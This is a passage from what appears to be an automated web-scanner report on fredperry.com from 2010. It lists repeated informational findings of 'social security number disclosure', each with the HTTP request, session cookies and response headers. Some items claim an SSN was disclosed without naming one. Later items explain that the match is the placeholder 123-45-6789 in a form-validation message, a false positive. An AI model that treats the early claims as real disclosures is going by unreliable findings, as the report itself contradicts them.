Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's S
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.65. http://www.fredperry.com/men/t-shirts/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /men/t-shirts/

Issue detail

The following social security number was disclosed in the response:

Request

GET /men/t-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:56:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=qnu48lti5b337ljlku80fsmma5; expires=Tue, 09-Nov-2010 16:56:09 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> T-Shirt
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.66. http://www.fredperry.com/men/tennis/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /men/tennis/

Issue detail

The following social security number was disclosed in the response:

Request

GET /men/tennis/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:56:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=jljqa65r9i94hqgv7m8uiud123; expires=Tue, 09-Nov-2010 16:56:48 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Tennis
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.67. http://www.fredperry.com/men/track-jackets/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /men/track-jackets/

Issue detail

The following social security number was disclosed in the response:

Request

GET /men/track-jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:56:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=d04a9roe8um3kknnc3akg99sj2; expires=Tue, 09-Nov-2010 16:56:11 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Track J
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.68. http://www.fredperry.com/men/trousers/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /men/trousers/

Issue detail

The social security number pattern matched in the response is the placeholder 123-45-6789 in a client-side form-validation message (see the response body below), not a real social security number; the finding is a false positive.

Request

GET /men/trousers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:55:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=cusiib36tf2dhc231ie1lrh9r4; expires=Tue, 09-Nov-2010 16:55:55 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's T
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.69. http://www.fredperry.com/men/woven-shirts/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /men/woven-shirts/

Issue detail

The social security number pattern matched in the response is the placeholder 123-45-6789 in a client-side form-validation message (see the response body below), not a real social security number; the finding is a false positive.

Request

GET /men/woven-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:55:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ocnd6drusa2gri65vosiku60t3; expires=Tue, 09-Nov-2010 16:55:59 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Woven S
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.70. http://www.fredperry.com/productinfo/clothingsizes/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /productinfo/clothingsizes/

Issue detail

The social security number pattern matched in the response is the placeholder 123-45-6789 in a client-side form-validation message (see the response body below), not a real social security number; the finding is a false positive.

Request

GET /productinfo/clothingsizes/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:16:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=afhqfus9lkc6pfi8rm0mup6d03; expires=Tue, 09-Nov-2010 17:16:31 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Clothin
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.71. http://www.fredperry.com/productinfo/footwearsizes/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /productinfo/footwearsizes/

Issue detail

The social security number pattern matched in the response is the placeholder 123-45-6789 in a client-side form-validation message (see the response body below), not a real social security number; the finding is a false positive.

Request

GET /productinfo/footwearsizes/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:16:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=t4dodkhnun20jsb1eo0jnddpe7; expires=Tue, 09-Nov-2010 17:16:20 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32849

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Footwea
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.72. http://www.fredperry.com/productinfo/garmentcare/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /productinfo/garmentcare/

Issue detail

The social security number pattern matched in the response is the placeholder 123-45-6789 in a client-side form-validation message (see the response body below), not a real social security number; the finding is a false positive.

Request

GET /productinfo/garmentcare/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:16:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=03fb99c0binrvc448ru3lb2gu6; expires=Tue, 09-Nov-2010 17:16:16 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31272

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Garment
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.73. http://www.fredperry.com/sale/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /sale/

Issue detail

The social security number pattern matched in the response is the placeholder 123-45-6789 in a client-side form-validation message (see the response body below), not a real social security number; the finding is a false positive.

Request

GET /sale/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3u5jp752ti8svrvck3n1vv3703; expires=Tue, 09-Nov-2010 17:19:07 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Sale -
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.74. http://www.fredperry.com/shops/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /shops/

Issue detail

The social security number pattern matched in the response is the placeholder 123-45-6789 in a client-side form-validation message (see the response body below), not a real social security number; the finding is a false positive.

Request

GET /shops/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:13:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=qlde3d5egr5vu9mvfgqi54aji5; expires=Tue, 09-Nov-2010 17:13:30 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 68571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Our Sho
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.75. http://www.fredperry.com/site-map/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /site-map/

Issue detail

The social security number pattern matched in the response is the placeholder 123-45-6789 in a client-side form-validation message (see the response body below), not a real social security number; the finding is a false positive.

Request

GET /site-map/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:17:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=dedf6ep6bp89g32002juma1012; expires=Tue, 09-Nov-2010 17:17:47 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Site Ma
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.76. http://www.fredperry.com/women/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /women/

Issue detail

The social security number pattern matched in the response is the placeholder 123-45-6789 in a client-side form-validation message (see the response body below), not a real social security number; the finding is a false positive.

Request

GET /women/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:58:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=vp0e2ebg17qng0r6lsu7deo761; expires=Tue, 09-Nov-2010 16:58:14 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33740

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women -
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.77. http://www.fredperry.com/women/amy-winehouse-landing/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /women/amy-winehouse-landing/

Issue detail

The social security number pattern matched in the response is the placeholder 123-45-6789 in a client-side form-validation message (see the response body below), not a real social security number; the finding is a false positive.

Request

GET /women/amy-winehouse-landing/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:02:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=f2qme8ik93v80c0uh2u97enl87; expires=Tue, 09-Nov-2010 17:02:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Amy Win
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.78. http://www.fredperry.com/women/amy-winehouse/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /women/amy-winehouse/

Issue detail

The social security number pattern matched in the response is the placeholder 123-45-6789 in a client-side form-validation message (see the response body below), not a real social security number; the finding is a false positive.

Request

GET /women/amy-winehouse/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:02:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=5m3n4pf5hgotrsrisqoo3lqfn7; expires=Tue, 09-Nov-2010 17:02:41 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Amy Win
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.79. http://www.fredperry.com/women/dresses/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /women/dresses/

Issue detail

The social security number pattern matched in the response is the placeholder 123-45-6789 in a client-side form-validation message (see the response body below), not a real social security number; the finding is a false positive.

Request

GET /women/dresses/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:59:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ghl3l93cleoaniplj3c9jh79i2; expires=Tue, 09-Nov-2010 16:59:54 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37141

